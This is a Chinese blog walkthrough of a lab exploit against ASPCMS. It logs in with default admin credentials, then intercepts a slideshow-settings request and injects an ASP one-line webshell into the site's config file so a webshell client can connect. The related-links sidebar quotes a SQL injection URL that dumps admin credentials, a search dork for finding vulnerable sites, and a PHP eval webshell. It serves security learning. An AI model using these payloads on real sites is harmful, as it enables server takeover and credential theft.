ASPCMS漏洞之文件上传漏洞

于 2024-08-04 11:12:03 发布
阅读量349 收藏 5
点赞数 2
分类专栏: CMS 文章标签: web安全 安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57240513/article/details/140903501
版权

ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且

⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。

步骤一:访问靶场

访问后台页面——登录后台——填写用户密码,用户名是admin,密码是123456。

后台的地址:/admin_aspcms/login.asp

image-20240804104326798

点击扩展功能——幻灯片设置——点击保存——使用burpsuite抓包

image-20240804104759891

步骤二:抓包修改数据包插入 木马语句。

将抓包后的里面slideTextStatus字段后面改为1%25><%25Eval(Request (chr(65)))%25><%25 ,密码是a。

影响的文件是/config/AspCms_Config.asp

image-20240804105554437

发送到repeter重放器模块,查看修改成功后看到一个地址。

image-20240804110030210

步骤三:使用菜刀连接shell

访问一下地址进行菜刀连接

image-20240804110446369

连接成功

Mr.sloane
关注
专栏目录
复现 ASPCMS企业建站系统Cookies欺骗漏洞
记录并分享学习安全的知识点..
08-21 929
ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 ASPCMS2.0存在sql注入注入漏洞,可获得admin管理员用户的cookie值。
漏洞复现】AspCMS commentList.asp SQL注入
失心少年
09-14 1513
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。1.利用如下POC可获取管理员MD5的密码。
WEBaspcms漏洞利用
热门推荐
HAPPY
08-18 1万+
【社工方法】(不推荐) 1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人 2.接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password...
常见cms漏洞ASPCMS
最新发布
ineedmoreMuQ的博客
08-03 403
漏洞复现,使用后台配置文件拿shell。
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 705
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
0day漏洞aspcms漏洞实战
weixin_49071539的博客
12-16 3561
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
finecms-含有前台文件上传漏洞源码包.zip
01-04
《细解FineCMS前台文件上传漏洞及其源码分析》 FineCMS是一款常见的开源内容管理系统,以其易用性和灵活性深受开发者喜爱。然而,如同其他软件一样,FineCMS也存在潜在的安全问题,其中最为突出的就是前台文件上传...
文件上传漏洞的思维导图
04-19
11. **利用思路**:攻击者可能通过扫描、会员中心、后台系统、CMS漏洞、代码审计、第三方应用等多种途径寻找和利用文件上传漏洞。 总之,防止文件上传漏洞需要全面的安全策略,包括前端与后端的双重验证、合理的...
html文件上传漏洞,文件上传漏洞(绕过姿势)
weixin_31857829的博客
06-07 1491
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
文件上传漏洞方法总结
qq_62886656的博客
04-24 4950
文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令 的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传 后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 一 客户端绕过 可以通过禁用js来上传php文件 通过利用 burp 抓包改包,先上传一个 png类型的木马,然后通过 burp 将其改为php 后缀名即可 二 服务端绕过 (1) 黑名单扩展名绕过
修正的ASPCMS投票系统, V2.0版本(已修正IP限制、后台自动登录 去漏洞
03-12
修正的ASPCMS投票系统, V2.0版本(已修正IP限制、后台自动登录 去漏洞
aspcms绕过进入后台
04-11
aspcms绕过进入后台
aspcms爆后台地址
05-17
aspcms爆后台地址,秒杀老版本,修改后台地址一样能跳到真实地址
批量注入ASPCMS获得管理后台权限
08-25
批量注入ASPCMS获得管理后台权限,很好的东西
aspcms 密码找回- aspcms后台密码忘记找回
07-25
aspcms 密码找回,aspcms后台密码忘记找回 源码下载后 ,ftp上传到网站根目录,执行文件,设置新的管理员密码,后台登录输入新的密码即可。
文件上传小结——文件上传漏洞文件上传校验姿势、文件上传绕过、文件包含漏洞服务器解析漏洞……
7Riven's blog
12-02 691
文件上传文件上传可以与文件包含相结合 1.文件上传漏洞文件上传漏洞需要的前提条件: 能上传木马 上传的木马能执行 还要清楚上传后的路径 一句话木马:<?php @eval($_POST[cmd]);?> eval 执行命令函数 思路: 编写一个一句话木马<?php?> 上传一句话木马 上菜刀 图片马制作: 找个图片,用记事本打开,添加一句话 ...
aspcms 程序漏洞 注入+ cookies欺骗
weixin_30483013的博客
03-26 491
漏洞出现在 /plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,2...
aspcms投票系统后台插马漏洞
收集盒 Book box
12-21 2328
发布日期:2012-12-12 发布作者:月末 漏洞类型:设计错误 漏洞描述:后台配置文件采用文件写入,未严格过滤导致插入一句话木马。   config.asp内容 %Const SiteName="ASPCMS 开源投票系统 V1.0"             Const ks="0"                         Const xxps="1"
熊海cms文件上传漏洞
05-11
熊海CMS文件上传漏洞是指攻击者通过漏洞利用,上传恶意文件到受影响的网站上,从而达到控制网站的目的。该漏洞存在于熊海CMS系统的文件上传功能中,攻击者可以通过构造恶意的上传请求,绕过系统的上传验证机制,将恶意文件上传服务器上。 攻击者上传的恶意文件可能包含后门、木马等恶意代码,一旦被执行,就会导致网站被入侵、数据泄露等安全问题。 为了防止该漏洞被攻击者利用,建议网站管理员及时升级熊海CMS系统的版本,或者对文件上传功能进行二次开发,增强上传文件类型的验证机制。同时,也要注意定期备份网站数据,以防止数据丢失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值